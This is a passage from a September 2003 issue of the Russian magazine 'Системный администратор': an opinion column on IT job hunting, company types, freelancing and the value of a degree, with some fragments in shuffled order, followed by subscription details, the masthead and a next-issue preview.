Третье. Не обещай работодателю того, что ты все равно
не собираешься делать, и вообще поменьше всего обещай,
не строй никаких планов (Да я тут вам! Да я горы сверну!
№9(10), сентябрь 2003
iMHO
Другой немаловажный критерий: отношение руковод-
ства к своим сотрудникам. Не секрет, что во многих фир-
мах отношение к людям поистине скотское: начальство
постоянно треплет нервы, беспричинно объявляет выго-
воры, загружает работой сверх всяких норм и при этом
считает, что персонал им чем-то еще и обязан. В других
же фирмах, напротив, начальник – чуть ли не отец род-
ной и атмосфера в коллективе мягкая и спокойная. Никто
никого не пытается «подсидеть» или «обойти» в карьер-
ной гонке на выживание. Иной специалист, нарвавшись
на плохую фирму, начинает считать, что сейчас все фир-
мы такие. Вовсе нет! Ищите то, что вам нужно, и вы это
найдете! Интернет-знакомства в этом помогают до чрез-
вычайности, просто заведите более или менее личную
переписку с некоторыми симпатичными лично вам сотруд-
никами различных фирм – как ведущими специалистами,
так и простыми рабочими. Сразу же станет ясно что к чему
и что та или иная фирма собой представляет.
Итак, фирма выбрана. Друзья в ней у вас уже имеют-
ся. Ваша квалификация им отлично известна (ну не бол-
тали же вы все это время о погоде? Наверняка ведь об-
суждали те или иные технические проблемы и не исклю-
чено, что оказывали фирме довольно ценные услуги). И
что вы думаете, они еще и не принять вас могут?!
Стратегия действий в ситуации
«выбирают вас»
Собственно говоря, у любого нормального специалиста
проблема в трудоустройстве только одна: найти веский
повод для отказа очередному нанимателю, ухитрившись
при этом его не обидеть (а обижать нельзя, мало ли, вдруг
с ним еще сотрудничать придется).
Просто занимайтесь своим любимым делом: ковыряй-
тесь в железе, пишите программки «для души», изучайте
сетевые протоколы, общайтесь по Интернету, и вы сами
не заметите, как предложения о работе посыпятся одно за
другим. Выбирайте! И не стесняйтесь диктовать свои ус-
ловия нанимателям. Ведь это они пришли к вам, это они
нуждаются в вас, так что никакие компромиссы тут неуме-
стны. Зачем соглашаться на заведомо плохую работу, если
завтра наверняка появится еще более хорошая? Только не
переоцените свои возможности и свою значимость в гла-
зах нанимателя и – упаси Боже – не заразитесь звездной
болезнью, уверовав в то, что вы крутой специалист, кото-
рый все знает и которому все нипочем.
Вот только дорвусь до лопаты!). Напротив, будь сдержан (вот
осмотрюсь, вольюсь в струю коллектива, а там… если до
той поры вы меня не уволите… мы и посмотрим).
Четвертое (вытекающее из третьего). Не ходи в чужой
монастырь со своим уставом. Не пытайся убеждать фир-
му, что они делают что-то не так, и что ты мог бы сделать
это лучше.
Пятое (диаметрально расходящееся с четвертым).
Если у тебя есть свои идеи и ты видишь, что кое-что здесь
можно было бы и улучшить, не пытайся загонять инициа-
тиву внутрь. Дай ей свободу. Может быть, конкретно в этом
месте тебе и откажут, но рано или поздно ты найдешь
именно ту работу, которую тебе нужно.
91
 IMHO
Шестое. Если тебя спросят то, чего ты не знаешь, говори
правду «не знаю» и не думай, что ты подписываешь этими
словами свой смертный приговор. В конце концов работо-
датель и не надеется найти специалиста, который бы все
знал (такой специалист далеко не каждому по карману).
Седьмое. Постарайся поставить работодателя в не-
стандартную ситуацию. Если он говорит десять тысяч руб-
лей, говори: «Нет! (и после непродолжительной паузы) Де-
сять – это слишком много. Давайте пять… (пауза) для
начала. А там, когда мы присмотримся друг к другу, – там
видно будет».
Восьмое. Если работодатель, ранее незнакомый тебе,
попытается с места в карьер перескочить на дружеские
отношения, держись от него на официальной дистанции,
ибо такая «дружба» обычно приводит к необходимости
выполнения поручений, непосредственно не связанных
с твоей работой и к тому же никак не оплачиваемых.
Девятое. Если тебя все-таки не приняли – не расстраи-
вайся. Возможно, причина вовсе не в тебе, а в нанимателе.
Корпорации и крупные компании
Здесь вы будете чувствовать себя крошечным винтиком
гигантской машины, ваше мнение никого не будет интере-
совать, вас обяжут соблюдать определенный корпоратив-
ный кодекс (даже если он будет противен вам). Атмосфера
компании скорее всего будет нездоровая. Из низких чинов
будет полно кретинических карьеристов (и вам придется
им подчиняться), среднее и высшее руководство ничего
не будет знать о вашем существовании (ну кто вы для них),
а от ваших коллег (среди которых карьеристы тоже най-
дутся) придется в любой момент ждать удара в спину.
Теперь о плюсах. Устроиться в такие компании оказы-
вается на удивление легко, однако к вашим профессиональ-
ным навыкам отношение будет довольно скептическим (типа:
вот проработай в компании с мое), хотя у многих тамошних
авторитетов с солидным стажем и высокими должностями
даже зачатки профессионализма и не ночевали. Умные
люди, конечно, будут. И их будет много. Но дураков будет
еще больше. Заплаты здесь средние (кормить свой штат во
всей его своре непросто даже гигантам), правда, зарплата
резко растет вместе с карьерой, но карьеру в силу огром-
ной конкуренции здесь строить трудно. Профессиональных
навыков такая работа тоже не дает (сначала вы будете ка-
менщиком, который должен класть от сих до сих, даже если
это и заведомо неправильно, а все попытки проявить ини-
циативу будут жестоко вырезаться на корню, потом вы бу-
дете руководителем каменщиков, которому сверху спущен
план, кривой, как бумеранг, разумеется, но внесение исправ-
лений выходит за пределы вашей компетенции…. даже если
вы пробьетесь в архитекторы, вы окажетесь под жестоким
давлением кучи дизайнеров, менеджеров и прочих марке-
тоидов, предъявляющих к проекту нелепые и взаимоисклю-
чающие требования). Черт, минусов все-таки выходит боль-
ше. Зато уходить с работы вы будете в точно заданное вре-
мя. Секунда в секунду.
Средние компании
Нет, вы не винтик. Вы структурная единица (по типу семья –
ячейка общества), и к вашему мнению иногда будет прислу-
92
шиваться даже Сам Главный. Корпоративный кодекс (если
он вообще есть) обычно распространяется на «мальчиков»
и «девочек», специально нанятых для демонстрации «лица
фирмы». Специалисты (особенно хорошие) находятся в до-
вольно независимых условиях и могут жить в собственном
стиле (только голых баб на стенку не надо, ок?). Атмосфера
здесь бывает самая разнообразная, но чаще относительно
невысокой степени загазованности (то есть жить можно, хотя
в горле все-таки першит). Карьеристов не так много, а от-
кровенных идиотов среди них, за редкими исключениями, и
вовсе нет. При наличии дипломатических навыков вы быст-
ро наладите хорошие отношения со всей вертикалью влас-
ти, и если «нижние» начнут прижимать, вы сможете урегу-
лировать ситуацию путем обращения «наверх».
Устроиться в такие компании достаточно тяжело, т.к. все
хорошие места уже давно схвачены, а штат и так раздут
сверх предела. Зато если уж устроились, то для реализации
собственного потенциала лучшего плацдарма и не приду-
маешь. Никто, конечно, не говорит, что все будет идти как
по маслу. Вы встретите и равнодушное непонимание, и оже-
сточенное сопротивление, и даже палки в колесах, все это
так, но… у средних фирм есть все необходимые средства
для реализации ваших планов (если только они не совсем
уж грандиозные), и к тому же есть потребность в новых иде-
ях (иначе компания просто не удержится на рынке). Так что
дерзайте. Удачи не желаю (удача – баба подлая и непосто-
янная), а вот лошадиная работоспособность вам бы не по-
мешала. Концентрация интеллектуального потенциала на
одно рабочее место в таких компаниях, как нигде, высока,
поэтому, если сумеете убедить в перспективности своих идей
всех окружающих, вместе горы свернете.
Зарплаты высокие и очень высокие (штат небольшой,
а его рентабельность велика), правда, карьеру сделать
еще труднее, чем в крупных компаниях, т.к. в отличие от
последних плановыми ротациями кадров здесь и не пах-
нет, да и вообще начальство меняется редко и неохотно.
Тем не менее, если нельзя развиваться вглубь, это еще
не означает, что вы не сможете развиваться вширь. Ра-
ботайте на своем рабочем месте, оттачивайте свои зна-
ния и навыки, наконец, просто получайте удовольствие
от самого процесса работы! Тем более что сверхурочные
задержки здесь не редкость, а норма.
Мелкие компании
Поздравляю! Вы в зазеркалье. Всякая мелкая компания есть
проекция личности ее шефа на обстановку окружающей
действительности. И чем компания мельче, тем она все за-
зеркалистее и зазеркалистее. Это может быть воздушный
замок, расположенный в дорогом офисе и с ног до головы
напичканный дорогой оргтехникой и улыбающимися личи-
ками топ-моделей, пытающихся играть роль секретарш.
Доходность предприятия, равно как и профессиональные
навыки его сотрудников, директора абсолютно не интересу-
ют (он вообще создал эту фирму ради отмывания денег). Но
это может быть и прокуренная подвальная комната, войти в
которую можно только изогнувшись по синусоиде. Здесь все
свои, и сигаретный дым – один на всех. Начальник имеет
ровно столько же привилегий, сколько и остальные члены
команды. Ничего, хотя бы отдаленно напоминающего сле-

ды субординации, и в помине нет! Подчас такие команды
бывают на редкость сплоченными, особенно если охвачены
одной общей идеей, и устроиться сюда на работу может ока-
заться очень и очень трудно. Как правило, требуется личное
знакомство или рекомендация одного из членов команды.
Концентрация умных людей в мелких компаниях может
достигать и 120%. Работать в такой атмосфере чрезвычай-
но интересно и увлекательно, правда, работать приходится
очень и очень много. Порой – по 40-50 часов кряду (и это
отнюдь не гипербола!), причем, без каких-либо гарантий
получения достойной оплаты за свой труд. Все зависит от
того, насколько хорошо пойдет продукт на рынке. И, как по-
казывает практика, без посторонней помощи даже отлич-
ный продукт никуда не идет. Отсутствие грамотного менед-
жера, отсутствие долгосрочной рыночной стратегии, неуме-
лое планирование и амбициозные идеи при полном отсут-
ствии финансовых средств приводят к тому, что множество
мелких фирм разоряются чуть ли не в течение года. Самое
печальное, что реального опыта работа в таких фирмах не
дает, да и не может дать. Концентрация на частных пробле-
мах, общение с ограниченным кругом людей (не путать с
кругом ограниченных людей), изматывающая работа не ос-
тавляют после себя практически ничего. Ничего, что пред-
ставляло бы интерес для будущих работодателей.
Свободный копейщик
Практически все то же самое, что и в мелкой компании,
однако в своем домашнем офисе вы сам себе хозяин и
ALMA MATER
Чему учат в институтах, спешно переименованных в боль-
шинстве своем в университеты? Ну чему-нибудь да учат…
Не спорю, высшее образование грузилом в кармане ни-
когда не будет, хотя не будет оно и тем спасительным «по-
плавком», которым было при социализме. В наши дни дип-
лом для трудоустройства абсолютно необязателен. Автор
этой статьи не имеет диплома, и его отсутствие ни разу не
становилась непреодолимой преградой успешного трудо-
устройства. Даже наоборот. Устраиваясь в одну довольно
престижную и именитую фирму, автор попал на собеседо-
вание непосредственно к самому Главному Инженеру толь-
ко потому, что тот заинтересовался: что ж это за птица та-
кая набралась наглости сунуться сюда без следов свиде-
тельств высшего образования, когда к ним и «нормальные»
люди устроиться не могут. Собеседование с руководящи-
ми работниками фирмы в таких случаях решает все, и если
вы действительно квалифицированный специалист, то с
вероятностью, близкой к единице, вас возьмут. Хуже, ко-
нечно, нарваться на девочку-секретаршу. Этой весь ваш
профессионализм по барабану, и потому любыми путями
пробивайте дорогу наверх – к начальству.
Если хорошенько подумать, то можно прийти к выводу,
что высшее образование – это рулетка. Повезет – вы ока-
жетесь в коллективе умных людей, у которых действитель-
но есть чему поучиться, а не повезет – понапрасну потра-
тите время, причем весьма значительное его количество.
А ведь способность к обучению стремительно тает с воз-
растом. Так, может быть, лучше плюнуть на традиции и
вместо поступления в вуз заняться вопросами своего обу-
№9(10), сентябрь 2003
iMHO
потому можете заниматься именно тем, что вас в данный
момент больше всего интересует. Если сотрудничать с не-
сколькими фирмами одновременно, то вы практически на
сто процентов застрахованы от внезапного краха. Про-
граммируйте, администрируйте, ищите дыры в системах
безопасности – сотни компаний нуждаются в ваших ус-
лугах и перебоев с заказами не будет. Правда, работать
придется не очень много, а настолько много, что понача-
лу даже страшно себе представить, причем пословицу
«Волка ноги кормят» вам придется вспоминать не раз и
не два. Такая работа сильно изматывает, и, несмотря на
все прелести вольной жизни, свободный копейщик прак-
тически никогда не отказывается от постоянной работы –
стоит ему ее только предложить.
В самом деле – перспектив карьерного роста здесь
нет никаких (выше себя не прыгнешь). Сидишь, варишь-
ся в собственном соку, и ни обмена идеями тебе, ни про-
стой дружеской помощи в трудные часы. Конечно, об-
щаться с коллегами можно и по Интернету, но это все-
таки не то. Свободные копейщики – они, как кошки, бро-
дят где-то там сами по себе, на свою территорию чужих
не пускают, а профессиональными секретами делятся
крайне неохотно (ведь знания – это их хлеб). Возможно-
стей для реализации серьезных проектов у одиночек нет.
Если же несколько свободных кошек собираются в одну
команду, то это будет фирма, независимо от того, заре-
гистрирована она официально или нет.
чения самостоятельно? Ведь в конечном итоге специалис-
ты по информационным технологиям учатся всю свою
жизнь. Приобретаемые знания и навыки настолько быстро
устаревают, что описание передовых технологий просто не
успевает попасть в учебники, а преподаватели оказыва-
ются не в состоянии совмещать преподавательскую дея-
тельность с изучением всего нового. Да, конечно, какой-то
костяк знаний остается незыблемым и фундаментальным,
но… весь фокус в том, что: а) изучать фундаментальные
знания можно и вне института, учебников на то – море; б) -
понятие «фундаментальности» очень относительно. Вот,
допустим, интеграл. Вполне себе фундаментальное зна-
ние, но я знаю очень много высококвалифицированных про-
граммистов, которые с необходимостью вычисления интег-
ралов так ни разу и не сталкивались. Поклонники высшего
образования говорят: а вдруг завтра этот интеграл им при-
годится, а с ним еще и матрицы в придачу?! Что ж! Если
так, то алгоритм действий будет предельно прост. Идем в
ближайшую библиотеку (или же вовсе в Интернет), берем
там все, что мы хотели бы знать об интегралах, изучаем в
необходимом разрезе, реализуем, что нам там было надо
реализовать, и… забываем все это напрочь! (Негоже вся-
кий хлам в мозгу держать, и если хотите сохранить цепкую
память – учитесь все ненужное забывать). Какой смысл му-
чительно вспоминать с горем пополам зазубренные зна-
ния, какой смысл вообще зубрить весь «джентльменский
набор»? Потребуется – поднимете соответствующую ли-
тературу и прочитаете. То, что требуется часто, запомнит-
ся и так. То же, что требуется от случая к случаю, запоми-
нать нет необходимости.
93
 IMHO
Работа как средство
самоидентификации!
Говорят, что у «нас» работают, чтобы жить, а на Западе –
живут, чтобы работать. Если работа не приносит мораль-
ного удовлетворения, если основным символом успеха
становятся деньги, то единственное, что остается поре-
комендовать в такой ситуации: идите на рынок и торгуй-
те бананами, а в компьютерной индустрии вам делать
нечего. Не секрет, что многие становятся программиста-
ми лишь потому, что это «модно», «престижно» и к тому
же достаточно перспективно в карьерном и финансовом
отношении.
Выбирать работу по принципу «выгодности», а не по
степени призвания, вероятно, и есть основной отличитель-
ный признак «нового» времени от «доперестроечного»
прошлого. Помилуйте, судари/господа! Чтобы работать в
высокотехнологических сферах надобно призвание иметь,
то есть определенные наклонности от природы или хотя
бы непреодолимую тягу к компьютерам наконец. Причем
эта тяга должна выражаться не в стремлении купить про-
цессор покруче и запустить стрелялку поDOOMовистее,
а, напротив, изучить свой недорогой и далеко не самый
современный компьютер так, чтобы научиться чувство-
вать движение электронов в любой из его токовых цепей.
Наивно считать, что всему этому можно научиться в
94
институте, да окончите вы его хоть с красным дипломом,
но если наклонности к инженерным дисциплинам у вас
нет, то справиться с нештатными ситуациями вы все рав-
но не сможете. В лучшем случае будете худо-бедно ез-
дить по наезженному кругу. Конечно, рынку требуются
и такие люди, и у вас имеются достаточно неплохие шан-
сы найти себе отличную (в смысле зарплаты) работу,
но… если вы ее не полюбите, то, спрашивается, чего же
стоит вся ваша жизнь? Если вы не идентифицируете себя
со своей работой, если ваша работа не есть материаль-
ное воплощение ваших мыслей и чувств, то вы – труп
при жизни. Напротив, если все сделанное вами несет
частицу вас самого, вы будете жить ровно столько, сколь-
ко протянет последний из продуктов вашего труда, а
может быть, и еще больше! Ведь всякое Хорошее Дело
становится родоначальником других Хороших Дел.
Вот только найти свое настоящее призвание иной раз
оказывается очень трудно. Скажем, автор этой статьи,
долгое время занимавшийся программированием и до-
вольно скептически относящийся к журналистике/лите-
ратуре, своих наибольших успехов добился именно на
литературном поприще, что явилось для него полной нео-
жиданностью. Поэтому не зацикливайтесь лишь на од-
ном направлении! Подходите к поиску своего призвания
творчески и не бойтесь экспериментировать.
 подписка

Альтернативная подписка: ООО «Интер-Почта» по тел. (095) 500-00-60

Курьерская доставка по Москве
Открыта редакционная подписка на II полугодие 2003 г.
Информация на сайте www.samag.ru в разделе «Подписка»

81655

Единый
подписной
индекс:

81655
по каталогу 81655
агентства
«Роспечать»

Рады видеть
Вас нашими
читателями!

№9(10), сентябрь 2003 95

 СИСТЕМНЫЙ АДМИНИСТРАТОР
№9(10), Сентябрь, 2003 год
РЕДАКЦИЯ
Исполнительный директор
Владимир Положевец
Ответственный секретарь
Наталья Хвостова
sekretar@samag.ru
Технический редактор
Владимир Лукин
РЕКЛАМНАЯ СЛУЖБА
тел.: (095) 928-8253 (доб. 112)
факс: (095) 928-8253
Константин Меделян
reсlama@samag.ru
Верстка и оформление
imposer@samag.ru
maker_up@samag.ru
Дизайн обложки
Николай Петрочук
103012, г. Москва,
Ветошный переулок, дом 13/15
тел.: (095) 928-8253 (доб. 112)
факс: (095) 928-8253
Е-mail: info@samag.ru
Internet: www.samag.ru
РУКОВОДИТЕЛЬ ПРОЕКТА
Петр Положевец
УЧРЕДИТЕЛИ
Владимир Положевец
Александр Михалев
ИЗДАТЕЛЬ
ЗАО «Издательский дом
«Учительская газета»
Отпечатано типографией
ООО «Мастер Печати»
Тираж 5500 экз.
Журнал зарегистрирован
в Министерстве РФ по делам печати,
телерадиовещания и средств мас-
совых коммуникаций (свидетельство
ПИ № 77-12542 от 24 апреля 2002г.)
За содержание статьи ответственность
несет автор. За содержание рекламно-
го обьявления ответственность несет
рекламодатель. Все права на опубли-
кованные материалы защищены. Ре-
дакция оставляет за собой право изме-
нять содержание следующих номеров.
96
ЧИТАЙТЕ
В СЛЕДУЮЩЕМ
НОМЕРЕ:
Установка Свой собственный модуль
IMAP4-сервера на базе В этой статье мы рассмотрим основ-
cyrus-imapd + sendmail ные операции с модулями ядра Linux,
Традиционный протокол POP3, ис- а также создание собственного моду-
пользуемый клиентскими программа- ля, позволяющего расширить возмож-
ми для получения почты с сервера, об- ности ядра операционной системы.
ладает рядом недостатков – во-пер- В Linux драйверы выполнены в
вых, в рамках почтовой сессии пароль виде модулей ядра. Ядро Linux содер-
передается в открытом виде (plain жит только самый необходимый код –
text) и злоумышленник может легко чтобы только загрузиться. Поддерж-
его перехватить. ку остальных устройств обеспечива-
Во-вторых, если пользователь заби- ют модули, которые встраиваются в
рает почту с разных мест, ему везде ядро при загрузке системы. С помо-
придется настраивать фильтры для сор- щью пакета modutils, который будет
тировки в почтовом клиенте и скачи- рассмотрен ниже, вы можете доба-
вать заново всю почту с сервера. вить нужный вам модуль в ядро во
В-третьих, если вы заведомо зна- время работы системы. При этом пе-
ете, что вам нужно удалить какое-то резагружать систему не нужно – уст-
сообщение прямо на сервере, пред- ройство начнет работать сразу же
варительно его придется загрузить к после загрузки модуля.
себе на машину. Раньше, в первых версиях ядра
Альтернативой POP3 может служить Linux, механизм работы с модулями
IMAP (Internet Message Access Protocol), не был предусмотрен, и ядра тех вре-
который и призван избавить пользова- мен содержали в себе код драйверов
теля от вышеупомянутых проблем. для всех поддерживаемых устройств.
Такое решение нельзя назвать
Анализ защиты программ рациональным. Мы не можем пре-
и рекомендации дусмотреть, какие устройства будут
по её усилению установлены у конечного пользова-
Для того чтобы защитить программы теля, даже если включить в состав
от взлома, необходимо знать, против ядра драйверы всех возможных ус-
чего мы боремся. Будем считать, что тройств.
мы являемся разработчиками про- Исходя из всего этого, разработ-
граммного обеспечения и нам проти- чики ядра Linux «изобрели» механизм
востоит взломщик среднего уровня. динамически загружаемых модулей.
Мы участвуем!
На стыке сентября и октября наш журнал примет участие сразу в двух значи-
тельных мероприятиях: 14-й ежегодной выставке информационных техноло-
гий SofTool (30.09.2003 – 04.10.2003) и конференции АДЭ (ассоциация доку-
ментальной электросвязи).
На SofTool все желающие могут найти нас на стенде №Е38, чтобы пооб-
щаться с представителями журнала, задать интересующие вопросы, купить
старые и новые номера и договориться о деловом сотрудничестве.
В Конференции АДЭ (30.09.2003 – 02.10.2003) примут участие специа-
листы и руководители крупных фирм и организаций. Сама конференция бу-
дет проходить в Подмосковье, в отеле Виноградово, и благодаря насыщенно-
сти программы ожидается крайне плодотворной.
Рекламные материалы данных мероприятий вы сможете найти на страни-
цах нашего журнала.